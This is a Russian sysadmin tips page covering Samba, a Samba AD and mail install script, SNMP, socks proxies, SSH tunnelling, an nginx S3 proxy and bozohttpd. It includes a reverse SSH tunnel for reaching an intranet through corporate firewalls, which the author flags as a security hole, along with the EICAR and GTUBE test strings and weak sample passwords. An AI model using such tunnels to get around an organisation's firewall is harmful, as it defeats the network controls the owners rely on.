пересобираем ядро: options NETSMB #SMB/CIFS requester options NETSMBCRYPTO #encrypted password support for SMB options LIBMCHAIN #mbuf management library options LIBICONV options SMBFS Коннектимся к удаленному SMB серверу: smbutil login //jwarner@smbserver1 Монтируем русурс: mount_smbfs -N //jwarner@smbserver1/sharename /backup Отсоединяемся от SMB сервера: smbutil logout //jwarner@smbserver1

Что можно сделать для увеличения производительности samba ? (доп. ссылка 1) [комментарии]

В smb.conf: socket options = TCP_NODELAY IPTOS_LOWDELAY SO_SNDBUF=4096 SO_RCVBUF=4096 read size = 32768 read raw = no read prediction = true write raw = yes wide links = no oplocks = yes max xmit = 65535 dead time = 15 getwd cache = yes lpq cache = 30 level2 oplocks = true Linux: echo "100 1000 128 128 500 6000 6000 1884 2" >/proc/sys/vm/bdflush FreeBSD: /sbin/sysctl -w net.local.stream.recvspace=65535 /sbin/sysctl -w net.local.stream.sendspace=65535 /sbin/sysctl -w net.inet.tcp.sendspace=65535 /sbin/sysctl -w net.inet.tcp.recvspace=65535

Как запретить запись файлов по определенной маске на Samba сервер Автор: bass [комментарии]

veto files = /*.dll/ veto files = /*.dll/*.exe/ veto files = /*Security*/*.tmp/*root*/

Как позволить пользователям самим менять samba пароли со своих машин. [комментарии]

security = user encrypt passwords = yes smb passwd file = /etc/samba/smbpasswd unix password sync = yes passwd program = /usr/bin/passwd %u passwd chat = *New*password* %n\n *Please*retype*new*password* %n\n *password*successfully*updated*

Как правильно описать доступ к samba через hosts allow [обсудить]

hosts allow можно указывать в следующем виде: hosts allow = 192.168.1., 127. hosts allow = 192.168.1.0, 127.0.0.1/255.255.255.0 hosts allow = 192.168., EXCEPT 192.168.1.100

Как посмотреть список расшаренных ресурсов на Windows машине [обсудить]

IP машины - 1.2.3.4 smbclient -I 1.2.3.4 -L NAME_SERVER или: nmblookup -r -A 1.2.3.4 или: smbclient -N -L hostname -I 1.2.3.4 или скрипт: smbfind или findsmb

Автоматизация установки Samba AD+DDNS+DHCPD и почтового сервера в openSUSE Leap 15.5 (доп. ссылка 1) Автор: Геннадий Калашников [комментарии]

Подготовлен скрипт adc_install.sh (копия) для упрощения миграции с продуктов Microsoft на Linux с контроллером домена на основе Samba. Скрипт автоматизирует установку Samba AD+DDNS+DHCPD, почтового сервера на основе Postfix+Dovecot и FTP-сервера vstfpd в openSUSE Leap 15.5, что может оказаться полезным когда нужно быстро развернуть рабочую систему, а уже потом заниматься экспериментами и тонкой настройкой. Cкрипт запускается командой: ./adc_install.sh (-OPTION) Поддерживаемые параметры: -ad_install - Установить Samba_AD NAMED DHCPD. -ad_uninstall - Удалить конфигурацию Samba_AD. -ad_restart - Restart Samba_AD NAMED DHCPD. -ad_status - Status Samba_AD NAMED DHCPD. -ad_test - Прoверка работы Samba_AD. -uadd - Создать пользователя домена. -udel - Удалить пользователя домена. -gadd - Создать группу домена. -ugadd - Ввести пользователя в группу домена. -upass - Задать пароль пользователю домена -dhcp - Установить DHCPD. -dhcp_on - Включить DHCPD demon. Вводит IP-адрес и имя компьютера ( принтера, смартфона и пр.) в прямую и обратную зону DNS. -dhcp_off - Выключить DHCPD demon. -bind - Установить NAMED. -c_add - Ввеcти компьютер в DNS. -c_del - Удалить компьютер из DNS. -cname_add - Присвоить новое имя компьютеру - CNAME в DNS. -cname_del - Удалить имя компьютера - CNAME из DNS. -ns_add - Ввеcти NS запись для компьютера в обратную зону DNS. -mx_add - Ввеcти MX запись для компьютера в DNS. -ftp - Установить FTP Сервер VSTPD. -http - Установить HTTP Сервер Apache2. -mail_inst - Установить почтовый сервер. -mail_uninst - Удалить конфигурацию почтового серверa. -mail_restart - перезапуск почтового серверa. -mail_status - состояние почтового серверa. -mail_stop - остановка почтового серверa. -mail_test - тестирование почтового серверa. -padmin - Установить PostfixAdmin -madmin - Установить phpMyAdmin -rcube - Установить Roundcubemail -bsys - Бэкап внесённых изменений в систему Устанавливаем свежую версию openSUSE Leap 15.5 с официального сайта openSUSE Leap 15.5 - https://get.opensuse.org/leap/15.5/ Приступим к установке Samba Active Directory Domain Controller, сопровождая этот процесс скриншотами Стартуем Yast2 и устанавливаем: 1. Название сервера --> adc.dyhap.net 2. Название домена --> dyhap.net 3. IP адрес сервера --> 192.168.3.4 4. Шлюз --> 192.168.3.2 5. IP адрес внешнего DNS --> 192.168.1.1 и 1.1.1.1 Мы видим - сервер получил нужные параметры. Теперь выполним команду: # ./adc_install.sh -ad_install Зададим пароль администратору Samba AD... ну скажем --> "OpenSUSE15". Зададим IP DNS --> 192.168.1.1 Установка Samba AD+DDNS+DHCPD закончена. Осталось только сделать "reboot" сервера, чтобы наши установки вступили в силу. После старта проверим статус Samba AD, DNS и DHCP-Сервера. Выполним команду: # ./adc_install.sh -ad_restart ... и проверим статус сервера выполнив команду: # ./adc_install.sh -ad_status Сделаем тест системы. И выполним команду: # ./adc_install.sh -ad_test Теперь можем создать пользователя домена... ну скажем --> Wasja Pupkin. Выполним команду: # ./adc_install.sh -uadd Wasja Pupkin получил login для машины Windows в домене DYHAP: --> w.pupkin Так же netlogon скрипт: --> w.pupkin.bat И email-адрес: --> w.pupkin@dyhap.net Выполним команду: # ./adc_install.sh -mail_test А вот email-адреса "test_user@dyhap.net" как и пользователя домена "test_user" в системе нет. Создадим пользователя домена --> test_user. Установка Samba Active Directory Domain Controller закончена. Теперь приступим к установке почтового сервера. Выполнив команду: # ./adc_install.sh -mail_inst мы установим: 1. service postfix 2. service dovecot 3. service amavis 4. service spamd 5. service clamd 6. service clamav-milter 7. service fail2ban 8. service freshclam Для этого необходимо создать: 1. ssl-сертификаты 2. администратора почтового сервера... --> mailadmin 3. пароль администратору mailadmin .. ну скажем --> "OpenSUSE15" Установка почтового Сервера закончена. Теперь можно добавить компьютер Windows по имени "win12" в домен Active Directory. 1. Стартуем компьютер в локальной сети --> параметры сетевого адаптера получены от DHCP сервера 2. "test_user" в домене --> DYHAP\test_user 3. IP адрес win12.dyhap.net --> 192.168.3.50 4. DHCP-Сервер ввёл win12.dyhap.net в DNS Стандартный процесс --> администратор "win12" вводит его в домен. В окне авторизации test_user указывает свои учетные данные и получает права на ввод в рабочей станции win12 в домен. Теперь test_user получил доступ к таким ресурсам в Active Directory, как электронная почта, приложения и сеть. При входе стартует скрипт "test_user.bat" и test_user получил доступ к таким ресурсам "Users" и "public" в сети Active Directory Домашний каталог test_user на сервере. 1. Перемещаемый профиль --> test_user.V6 2. Почтовый каталог --> Maildir Теперь протестируем работу почтового Сервера . Выполним команду: # ./adc_install.sh -mail_status [[IMG /soft/adc/mail/[33.jpg]] ...всё работает Стартуем на сервере почтовый клиент Thunderbird. 1. Cоздадим учетную запись почты пользователя --> "mailadmin" 2. "mailadmin" отправил письмо пользователю --> "gennadi@dyhap.net" 3. Сообщение об ошибке можно проигнорировать и повторить 4. Это информация о том, что ssl-сертификаты самодельные. Пользователь "gennadi" принимает письмо от "mailadmin" почтовым клиентом KMail openSUSE 15.5 . Стартуем на сервере почтовый клиент Kmail. 1. Cоздадим учетную запись почты пользователя --> "gennadi" 4. И принимаем информацию о том, что ssl-сертификаты самодельные. Пользователь "gennadi" получил письмо от "mailadmin" и отправляет ответ. Пользователь "mailadmin" отправляет письмо с тест-вирусом: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* --> на имя "gennadi". НО антивирус "clamd" заблокировал его. Пользователь "gennadi" отправляет письмо с ANTI-SPAM-TEST: XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X --> на имя "mailadmin". НО антиспам "amavis" отправляет его в карантин. ANTI-SPAM и ANTIVIRUS работают Cоздадим учетную запись почты пользователя "test_user" на компьютере "win12" Пользователь "test_user" получил письмо от "mailadmin" и отправляет ответ. Почтовый Сервер прекрасно работает. НО для работы в интернете нужны настоящие SSL-сертификаты. Установка Apache2+PHP8+SSL. Выполним команду: # ./adc_install.sh -http Установка phpMyAdmin. Выполним команду: # ./adc_install.sh -madmin login: root Password: OpenSUSE15 Установка PostfixAdmin. Выполним команду: # ./adc_install.sh -padmin Setup password: OpenSUSE15 Установка Roundcubemail. Выполним команду: # ./adc_install.sh -rcube imap_host = ssl://webmail.dyhap.net:993 smtp_host = ssl://webmail.dyhap.net:465 Любой пользователь домена получает права на пользование Roundcubemail. Установка VSFTPd Сервера. Выполним команду: # ./adc_install.sh -ftp VSFTPd Сервер прекрасно работает. Пользователь "test_user" получил права на пользование VSFTPd Сервером. Apache Directory Studio - это бесплатный инструмент среды разработки, предназначенный для создания и управления LDAP-серверами. LDAP (Lightweight Directory Access Protocol) - это протокол, используемый для доступа к каталогам, которые хранят информацию об объектах в системе. Это базовая установка Сервера. Ну вот...и всё, конфигурационные файлы известны и теперь вы можете точнее настроить сервер под свои нужды. Уточнение: в статье используются самоподписанные сертификаты, при необходимости их следует заменить на настоящие SSL-сертификаты.

SNMP

Как по SNMP скинуть dialup пользователя с линии (Cisco AS) [комментарии]

Скинуть пользователя по заданному порту (N) можно через OID: 1.3.6.1.4.1.9.9.150.1.1.3.1.5.N snmpset as-1.test.ru private .1.3.6.1.4.1.9.9.150.1.1.3.1.5.N i 1 Соспоставить логин с номером порта можно через OID: 1.3.6.1.4.1.9.9.150.1.1.3.1.2 Или из FAQ: snmpset -v1 as-1.test.ru private .1.3.6.1.4.1.9.2.9.10.0 i $line

Как в UCD-SNMP прописать скрипт для обработки нужного MIB ObjectID [обсудить]

Полный контроль над MIBOID осуществляется с помощью команды pass. pass MIBOID EXEC-COMMAND Например: pass .1.3.6.1.4.1.2021.255 /bin/sh /usr/local/local/passtest Как писать обработчик passtest, можно найти в поставке ucd-snmp. Если просто нужно выдать результат выполнения скрипта, можно использовать exec: exec .1.3.6.1.4.1.2021.51 ps /bin/ps

Socks proxy

Организация работы Opera и других приложений через Socks (доп. ссылка 1) [комментарии]

Если на локальной машине кроме socks имеется выход в интернет или доступ к DNS-резолверу, проблем не возникает, но если выход машины производится только через socks при запуске программ подобных браузеру opera всплывает неприятная проблема с резолвингом имен. Проблема в том, что утилиты подобные tsocks не позволяют перенаправлять DNS запросы через Socks и организовать работу резолвера поверх этого протокола. Выход найден в использовании privoxy (http://www.privoxy.org/), некеширующего HTTP-прокси, умеющего организовывать проброс трафика через Socks и самое важное - умеющего резолвить DNS-имена на socks-сервере. Ставим privoxy: sudo apt-get install privoxy Предположим на локальной машине имеется доступ к socks-серверу 127.0.0.1:1080 В моем случае socks использовался для организации выхода в Интернет через телефон на платформе Android, делается это так: На телефоне включаем в настройках режим "USB Debugging" (Settings / Applications / Development) и запускаем программу Tetherbot (http://graha.ms/androidproxy/Tetherbot.apk). На локальный компьютер копируем программу adb из состава Android SDK и выполняем: ./adb forward tcp:1080 tcp:1080 теперь в Firefox можно прописать socks-сервер 127.0.0.1:1080 и поставить в about:config network.proxy.socks_remote_dns=true, все будет прекрасно работать. Но нам нужно заставить работать opera и другие программы, поэтому настраиваем privoxy. В /etc/privoxy/config проверяем наличие директивы (по умолчанию выбран порт 8118) listen-address 127.0.0.1:8080 и добавляем строку: forward-socks4a / 127.0.0.1:1080 . или forward-socks5 / 127.0.0.1:1080 . (внимание, режим forward-socks4 проброс DNS не поддерживает) Запускаем privoxy: sudo /etc/init.d/privoxy start Далее в opera устанавливаем в настройках обычного HTTP-прокси хост 127.0.0.1 и порт 8080. Все прекрасно работает, более того в качестве бонуса privoxy по умолчанию вырезает рекламу. Для консольных приложений удобно использовать пакет proxychains (http://proxychains.sourceforge.net/) в состав которого входит утилита proxyresolv для резолвинга имен через socks.

Решение проблем с DNS сервером при работе Firefox через Socks прокси [комментарии]

По умолчанию при включении работы Firefox через Socks прокси, DNS запросы продолжают обрабатываться локальным резолвером, что приводит к неработе преобразования имен в Firefox при отсутствии на машине иного выхода в сеть, кроме socks сервера. Решение: в настройках about:config следует поменять значение переменной network.proxy.socks_remote_dns с false на true, тогда DNS запросы начнут транслироваться через socks сервер. При нахождении в недоверительной сети, самый простой способ поднять socks туннель через внешний сервер: ssh -D 1080 логин@ip_сервера а затем настроить на локальной машине доступ через socks5 127.0.0.1:1080

Туннели с использованием SSH. Режим эмуляции Socks proxy в SSH (доп. ссылка 1) (доп. ссылка 2) Автор: Vladimir Brednikov [комментарии]

1. Режим эмуляции Socks proxy в SSH Допустим, у нас есть рабочая станция в локальной сети за firewall'ом; также имеется ssh-доступ на сервер в Интернете. Кроме ssh, никакой связи с внешним миром не имеется, а очень хочется, например, подключиться к какому-нибудь jabber-серверу. На рабочей станции запускаем простую команду: ssh -D 5555 user@remotehost -f -N , где -D 5555 - эмуляция SOCKS сервера через порт 5555 -f - работа в фоне, после аутентификации -N - не запускать shell на удаленном хосте. Теперь, указав в настройках XMPP-клиента (например, Pidgin'а) в качестве SOCKS5 прокси localhost:5555, получим желаемый результат: Pidgin соединяется с сервером через внешний сервер. 2. Туннель ssh Дано: сервер локальной сети ourproxy.provider.ru, доступный извне. Требуется: получить из дома доступ к ресурсам внутри локальной сети, например, к интранет-серверу 10.10.5.1:80 Решение: выполнить на домашней машине команду, пробрасывающую туннель к искомому IP-адресу через ourproxy.provider.ru: ssh -f -N user@ourproxy.provider.ru -L 8080:10.10.5.1:80 Опция -f говорит ssh, что после соединения нужно уйти в background. Опция -N указывает, что никаких команд выполнять не нужно Ключ -L означает, что соединения к localhost на порт 8080 нужно перенаправлять на 80 порт IP-адреса 10.10.5.1 Таким образом, набирая в браузере адрес http://localhost:8080, попадаем на нужный сервер. 3. Обратный туннель ssh Дано: компьютер на работе, находящийся за firewall'ом и nat'ом; компьютер дома с доступом в интернет; сервер ourproxy.provider.ru с работающим sshd, доступный обоим компьютерам. Но в данном случае прямой доступ с ourproxy.provider.ru к рабочей машине отсутствует. Требуется: получить из дома доступ к сервису sshd на рабочем компьютере. Решение: на рабочей машине выполнить команду: ssh -f -N user@ourproxy.provider.ru -R 12345:localhost:22 Опции -f и -N описаны несколькими строчками выше. Ключ -R означает, что подключения к порту 12345 на ourproxy.provider.ru будут перенаправляться на 22 порт рабочего компьютера. После выполнения этой команды с рабочей машины можно будет попасть на эту машину с ourproxy.provider.ru, выполнив команду: ssh -p 12345 user@locahost По этому же принципу можно получить доступ к прочим ресурсам локальной сети. Вот еще один пример. На рабочей машине: ssh -f -N user@ourproxy.provider.ru -R 8080:10.10.5.1:80 На домашней машине: ssh -f -N user@ourproxy.provider.ru -L localhost:8080:localhost:8080 Теперь, набрав в адресной строке браузера на домашнем компьютере http://localhost:8080, получаем доступ к интранет-серверу за семью замками двумя firewall-ами. Конечно же, это приводит к серьёзной бреши в корпоративной безопасности, поэтому крайне не рекомендуется злоупотреблять этим советом.

Как заставить любую программу работать через HTTP прокси (доп. ссылка 1) Автор: zabivator [комментарии]

Ниже пример как заставить ICQ клиента, например http://kopete.kde.org, работать через HTTP прокси. Суть метода: icq_client => socks => http_proxy Ставим пакет dante-client - пользователям debian это сделать можно так: sudo apt-get install dante-client Затем залазим в настройки ( в debian'e - /etc/dante.conf) В конце файла прописываем: route { from: 0.0.0.0/0 to: 0.0.0.0/0 via: proxy.testhost.ru port = 3128 proxyprotocol: http_v1.0 } Где proxy.testhost.ru - адрес http прокси, 3128 - порт прокси. П Дальше запускаем kopete... следующим образом: socksify kopete Пробрасывать весь трафик приложения через socks v.4 или v.5 сервер можно также используя http://tsocks.sourceforge.net/

3 шага для перехода на UTF-8 во FreeBSD (доп. ссылка 1) Автор: Sokolov Alexey [комментарии]

1. в ~/.xinitrc пишем (именно сюда а не в /etc/profiles потому как системная консоль FreeBSD не поддерживает юникод, посему локаль сия будет использоваться только в иксах): export LANG='ru_RU.UTF-8' export LC_ALL='ru_RU.UTF-8' 2. выполняем конвертацию содержимого файловой системы из koi8-r в UTF-8 (необходим порт converters/convmv): %convmv -f koi8-r -t UTF-8 путь_к_разделу/* --notest -r 3. далее все зависит от терминала, если у вас что-то вроде gnome-terminal, то достаточно будет сменить кодировку в опциях на UTF-8, если же у вас что-то вроде xterm'а, тогда в ~/.Xresources необходимо будет поменять шрифт, например так (для этого шрифта необходим пакет x11-fonts/terminus-font): XTerm*font: -*-terminus-medium-*-*-*-*-*-*-*-*-iso10646-1 для syscons(4) на i386: 1. ставим sysutils/jfbterm и textproc/uim-m17nlib 2. меняем стандартную переключалку языка с Shift+Space на Ctrl+\ добавлением в ~/.uim (define-key generic-on-key? "<Control>\\") (define-key generic-off-key? "<Control>\\") 3. ставим локаль и добавляем запуск uim-fep и jfbterm в ~/.profile export LANG=ru_RU.UTF-8 exec jfbterm -e uim-fep или в ~/.login (для tcsh) setenv LANG ru_RU.UTF-8 exec jfbterm -e uim-fep Для syscons(4), универсальный способ, неполный юникод: 1. ставим шрифт и раскладку koi8-r в /etc/rc.conf # шрифт font8x8=koi8-r-8x8 font8x14=koi8-r-8x14 font8x16=koi8-r-8x16 # раскладка keymap=ru.koi8-r 2. ставим sysutils/screen, рекомендую более новый ftp://ftp.lissyara.su/users/Guest/screen.diff 3. ставим локаль и добавляем запуск screen в ~/.profile (для sh) # экспортируем локаль и тип терминала export LANG=ru_RU.UTF-8 TERM=xterm # запускаем сессию 'desktop', если уже не запущена if ! screen -S desktop -ls | fgrep -q desktop; then screen -S desktop -dm fi # подсоединяемся к сессии 'desktop' if vidcontrol -i adapter >&- 2>&- then # в syscons используем локаль koi8-r LC_CTYPE=ru_RU.KOI8-R TERM=cons25r \ exec screen -x desktop else # в X'ах используем дефолтную локаль exec screen -x desktop fi Примечание: Символы за пределами koi8-r будут отображаться как ??? (вопросики). Если хотите полный (многоязычный) юникод, то используйте способ с jfbterm.

Как заставить приложение работать через Socks или посылать запрос с другого IP [обсудить]

В комплекте socks клиента dante (http://www.inet.no/dante/) есть скрипт socksify, который позволяет прозрачно пробрасывать весь трафик приложения через socks сервер. Например: socksify ssh Предварительно, в /etc/socks.conf нужно прописать параметры сервера, например: route { from: 0.0.0.0/0 to: 0.0.0.0/0 via: 192.168.1.1 port = 1080 protocol: tcp udp proxyprotocol: socks_v5 } где, 192.168.1.1 - адрес прокси сервера. Другой вариант socks-враппера - tsocks (http://tsocks.sourceforge.net/). В /etc/tsocks.conf пишем: server = 127.0.0.1 server_type = 5 server_port = 1080 Инициируем socks-сервер в ssh: ssh -D localhost:1080 имя_хоста_через_который_организуем_туннель Запускаем программу, которая будет работать через socks: tsocks opera Для переброса трафика через HTTP прокси (используя метод CONNECT), подходит библиотека libconnect (http://libconnect.sourceforge.net/). Пример скрипта: #!/bin/sh export LD_PRELOAD=/usr/lib/libconnect.so прграмма Адрес прокси прописывается в /etc/libconnect.conf: p:192.168.1.1/3128 Можно использовать враппер из комплекта: libconnect telnet 111.222.123.234 23 Для отправки запроса с другого IP, привязанного к сетевому интерфейсу (алиаса), можно использовать libsis (http://www.palfrader.org/libsis/). Пример: #!/bin/sh export LD_PRELOAD=/usr/local/lib/libsis.so export SIS_SOURCE=192.168.10.99 программа

Как разбалансировать равномерно в Squid трафик между несколькими линками [комментарии]

Пример равномерной балансировки по 3 каналам: # acl rand1 dst 0.0.0.0/0.0.0.192 acl rand2 dst 0.0.0.64/0.0.0.192 acl rand3 dst 0.0.0.128/0.0.0.192 acl rand4 dst 0.0.0.192/0.0.0.192 acl rand5 dst 0.0.0.192/0.0.0.224 # acl rand6 dst 0.0.0.224/0.0.0.224 tcp_outgoing_address 10.1.1.1 rand2 tcp_outgoing_address 10.1.1.1 rand3 tcp_outgoing_address 10.1.1.2 rand4 tcp_outgoing_address 10.1.1.2 rand5 tcp_outgoing_address 10.1.1.3

Пример настройки dante socks сервера. [комментарии]

/etc/sockd.conf: # Куда пишем логи. logoutput: /var/log/socks/socks.log # На каком сетевом интерфейсе и порту обслуживаем socks клиентов. internal: rl0 port = 1080 # или можно указать IP: internal: 10.1.1.1 port = 1080 # С какого IP или интерфейса выходим во внешний мир. external: ed0 # или external: 1.2.3.4 # Используемый метод авторизации клиентов. none - без авторизации. method: username none #rfc931 # Разрешаем клиенту 192.168.0.2 выход через socks. client pass { from: 192.168.0.2/32 to: 0.0.0.0/0 log: connect disconnect iooperation } #Пример, как разрешить соединения от сервера. pass { from: 0.0.0.0/0 to: 0.0.0.0/0 command: connect udpassociate log: connect disconnect iooperation } # Пример, как запретить соединения от сервера block { from: 0.0.0.0/0 to: 0.0.0.0/0 log: connect error }

Пример настройки хоста работающего через socks (клиента) [обсудить]

/etc/socks.conf: # Запросы к DNS серверу 192.168.1.2 - директом. route { from: 0.0.0.0/0 to: 192.168.1.2/32 port = domain via: direct } # Loopback трафик директом. route{ from: 0.0.0.0/0 to: 127.0.0.0/8 via: direct } # Все запросы черех socks сервер 192.168.1.1 порт 1080. route { from: 0.0.0.0/0 to: 0.0.0.0/0 via: 192.168.1.1 port = 1080 protocol: tcp udp proxyprotocol: socks_v4 # Варианты: socks_v5, http_v1.0 - через http прокси, msproxy_v2 method: none # username - когда нужна авторизация }

Как в dante socks проконтролировать объем прокачиваемого трафика. [обсудить]

logoutput: /var/log/socks/socks.log pass { .... log: connect disconnect iooperation }

WWW, Apache httpd

Ограничение доступа и ресурсов, безопасность

Оптимизация и тюнинг Apache

Редирект, mod_rewrite

Проксирование запросов к S3 с помощью nginx и angie Автор: umask [комментарии]

С помощью nginx/angie и встроенного модуля perl можно проксировать запросы напрямую к S3. Ниже приведён пример для реализации S3 от DigitalOcean (Spaces). Для Amazon AWS S3 пример тоже подходит. Для авторизации доступа можно использовать пример совместно с модулем secure_link. http { ... perl_set $date 'sub { use POSIX qw(strftime); return strftime("%Y%m%d", gmtime()); }'; perl_set $datetime 'sub { use POSIX qw(strftime); return strftime("%Y%m%dT%H%M%SZ", gmtime()); }'; ### yum install perl-Digest-SHA perl_set $signed_digest 'sub { use Digest::SHA qw(hmac_sha256 hmac_sha256_hex sha256_hex); my $r = shift; my $data_key = hmac_sha256($r->variable(date), "AWS4" . $r->variable(aws_access_secret)); my $region_key = hmac_sha256($r->variable(aws_region), $data_key); my $service_key = hmac_sha256($r->variable(aws_service), $region_key); my $signing_key = hmac_sha256("aws4_request", $service_key); my $hash = sha256_hex($r->variable(canonical_request)); my $str = "AWS4-HMAC-SHA256" . "\n" . $r->variable(datetime) . "\n" . $r->variable(date) . "/" . $r->variable(aws_region) . "/" . $r->variable(aws_service) . "/aws4_request" . "\n" . $hash; return hmac_sha256_hex($str, $signing_key); }'; ... server { ... location @s3 { set $provider 'digitaloceanspaces.com'; set $bucket 'my-bycket-name'; set $aws_access_key 'my-key'; set $aws_access_secret 'my-secret'; set $aws_region 'ams3'; set $aws_service 's3'; ### perl -e 'use Digest::SHA qw(sha256_hex); my $s = sha256_hex(""); print $s, "\n"' set $empty_hash 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'; set $canonical_request 'GET\n$uri\n\nhost:$bucket.$aws_region.$provider\nx-amz-content-sha256:$empty_hash\nx-amz-date:$datetime\n\nhost;x-amz-content-sha256;x-amz-date\n$empty_hash'; proxy_buffering off; proxy_buffer_size 1m; proxy_buffers 64 64k; proxy_connect_timeout 11s; proxy_send_timeout 14s; proxy_read_timeout 17s; proxy_next_upstream error timeout invalid_header http_500 http_502 http_503 http_504 http_403 http_404; proxy_next_upstream_timeout 30s; proxy_next_upstream_tries 3; proxy_hide_header Strict-Transport-Security; proxy_hide_header x-amz-request-id; proxy_hide_header x-amz-meta-s3cmd-attrs; proxy_http_version 1.1; proxy_set_header Host '$bucket.$aws_region.$provider'; proxy_set_header x-amz-date '$datetime'; proxy_set_header Authorization 'AWS4-HMAC-SHA256 Credential=$aws_access_key/$date/$aws_region/$aws_service/aws4_request,SignedHeaders=host;x-amz-content-sha256;x-amz-date,Signature=$signed_digest'; proxy_set_header x-amz-content-sha256 '$empty_hash'; proxy_set_header Range '$http_range'; proxy_pass_request_headers off; proxy_pass_request_body off; proxy_pass https://$bucket.$aws_region.$provider; } ... } ... }

Организация кэширования только медленных ответов сервера при помощи Nginx (доп. ссылка 1) [комментарии]

Пример организации на стороне фронтэнда кэширования контента, который начинает отдаётся бэкендом дольше, чем через 3 секунды. Запросы, которые отдаются менее, чем за 3 секунды передаются клиенту минуя кэш. Время жизни записи в кэше составляет 60 секунд. Для расчёта времени отдачи используются два блока vhost с передачей переменной со временем задержки в заголовке X-Accel-Expires, созданной при помощи директивы "map". proxy_cache_path /home/tmpcache/mycache levels=1:2 keys_zone=example:10m; # Для запросов дольше 3 секунд устанавливаем время жизни записи в кэше в 60 секунд, иначе 0 (отдаём минуя кэш). map $request_time $longtime { "~^([3-9]|[1-9][0-9]+)\\." 60; default 0; } server { listen 127.0.0.1:8888; root /var/www/; server_name example.com; location / { proxy_redirect off; proxy_set_header Host $host; proxy_pass http://mybackend; add_header X-Accel-Expires $longtime; } } server { listen 8080; root /var/www/; server_name example.com; location / { proxy_redirect off; proxy_set_header Host $host; proxy_pass http://127.0.0.1:8888; proxy_cache example; proxy_cache_valid 200 0m; add_header X-Cached $upstream_cache_status; add_header X-Time $request_time; } } Проверка: # curl -I "http://example.com:8080/mylongrequest" ... X-Cached: MISS X-Time: 11.862 повторный запрос будет выдан из кэша: # curl -I "http://example.com:8080/mylongrequest" ... X-Cached: HIT X-Time: 0.000

Настройка web-сервера на базе bozohttpd и NetBSD 5.x Автор: Калегин Сергей Николаевич [комментарии]

С недавних пор я перевёл все свои сервера на операционные системы BSD и хочу рассказать об их преимуществах по сравнению с другими ОС, а также поделиться опытом их установки и настройки. Итак. Сразу хотелось бы предупредить вопросы, связанные с выбором этих систем. Почему я выбрал именно BSD (преимущественно OpenBSD и NetBSD)? Дело в том, что это лучшие операционные системы из тех, с которыми мне приходилось работать! До BSD на моих серверах стояли различные версии и реализации ОС Windows, Linux и Mac OS, однако ни одна из них не смогла обеспечить такую стабильность, нетребовательность к ресурсам и универсальность, а также простую, быструю и лёгкую настройку сервера (а именно этим сисадмин и занимается) как системы BSD. Более подробно об этом, я постараюсь рассказать в следующих своих статьях на данном сайте. А начать обзорный цикл статей по работе с системами BSD мне хотелось бы с демонстрации поразительной простоты и целостности данных ОС. Для примера я взял установку и настройку Web-сервера "с нуля", так как это одна из самых популярных функций сервера и, наверное, самая популярная ассоциация у пользователей всемирной паутины. К тому же, сделать это на баз е последних версий NetBSD и OpenBSD не просто, а ОЧЕНЬ просто! Делается это всего в три шага: 1) Выбрать компьютер для установки сервера; 2) Установить и настроить операционную систему (возьмём NetBSD 5.0); 3) Запустить и настроить bozohttpd (встроенный Web-сервер NetBSD 5.x). Вся эта работа займёт всего несколько минут!!! Скорость и простота - главные преимущества BSD-систем! 1. Начнём с выбора компьютера для установки сервера. Хотя... особый подбор здесь не требуется, так как, в данном случае, подойдёт практически любой компьютер, который попадётся под руку (старый, слабый, списанный в утиль и т.п.), ведь NetBSD - самая универсальная система в мире! Её можно поставить куда угодно, даже на тостер (в котором хлеб жарят)! 2. Далее, устанавливаем на выбранный компьютер ОС NetBSD. Для этого потребуется всего несколько сотен мегабайт (!!!) свободного места на диске (ну или на том носителе, куда Вы будете ставить систему) и пара минут времени. Подробное описание процесса установки я дам в отдельной статье. А для тестового сервера подойдут параметры по умолчанию, просто следуйте инструкциям на экранах инсталлятора (sysinst). 3. Ну а теперь самое интересное - запуск и настройка Web-сервера. Для этого в ОС NetBSD (как и в OpenBSD) ничего дополнительно ставить не придётся, так как в этих системах уже есть набор основных серверов (демонов), их нужно только включить! Делается это очень просто. Открываем на редактирование (с правами root-a) файл /etc/rc.conf и прописываем в него всё, что касается настроек httpd (там всего 4 пунктика). Образец данного конфигурационного файла (с примерами запуска различных серверов) лежит в каталоге /etc/defaults/ и он же является конфигурационным файлом по умолчанию (если в /etc/rc.conf ничего не прописано). Если же копаться в этом sample лень, то можно воспользоваться текстовым фильтром grep для извлечения нужных пунктов из /etc/defaults/rc.conf. Делается это так (один из вариантов): cat /etc/defaults/rc.conf | grep httpd >> /etc/rc.conf В результате выполнения этой команды в файл /etc/rc.conf будут добавлены все необходимые записи для запуска и конфигурации http-сервера. Остаётся их только подправить: httpd=YES (запускает сам сервер bozohttpd) После этого нужно прописать домашний каталог нашего сайта в директиве httpd_wwwdir, например так: httpd_wwwdir="/WWW" Если ничего не менять, то по умолчанию будет использован каталог /var/www/. Остальные можно оставить как есть. Вот и всё. Теперь у вас свой Web-сервер. После перезагрузки, разместите стартовый файл index.html (с которого начинается просмотр сайта) в папку /var/www/ и проверьте работу сервера с помощью браузера (лучше с другого компьютера сети) по адресу http://192.168.1.50/, где IP-шник 192.168.1.50 является адресом вашего сервера в сети. Более того, сервер изначально поддерживает CGI и позволяет обрабатывать запросы Web-пользователей с помощью shell-скриптов, расположенных в специальной папке, указание на которую прописывается в качестве параметра непосредственно при запуске httpd или же флага в файле /etc/rc.conf например так: httpd_flags="-c /var/www/cgi" (все CGI-скрипты должны лежать в этой директории) Код CGI-скрипта для /bin/sh выглядит примерно следующим образом: #!/bin/sh echo "Content-type: text/html"; echo ""; echo Today is `date`; exit 0; (Данный скрипт просто выводит текущую дату на экран.) При необходимости, с помощью той же команды echo "...."; можно выводить и HTML-код или же можно вставить его из отдельного файла с помощью cat и т.п. программ. Обратите внимание на то, что при обращении к CGI-файлу в URL обязательно нужно указывать инфикс .../cgi-bin/..., иначе он выполняться не будет! И не забудьте сделать скрипт исполняемым (с помощью команды chmod). Например: chmod +x test1.sh Далее можно обращаться к нему напрямую: /var/www/cgi/./test1.sh или же через браузер: http://192.168.1.50/cgi-bin/test1.sh Причём скрипты могут быть написаны как с помощью команд командного интерпретатора (типа /bin/sh) так и на любом языке программирования, для которого имеется интерпретатор в вашей системе (например Perl или Python). После того как сервер уже заработал, наверняка, многие озадачатся вопросом насчёт конфигурации 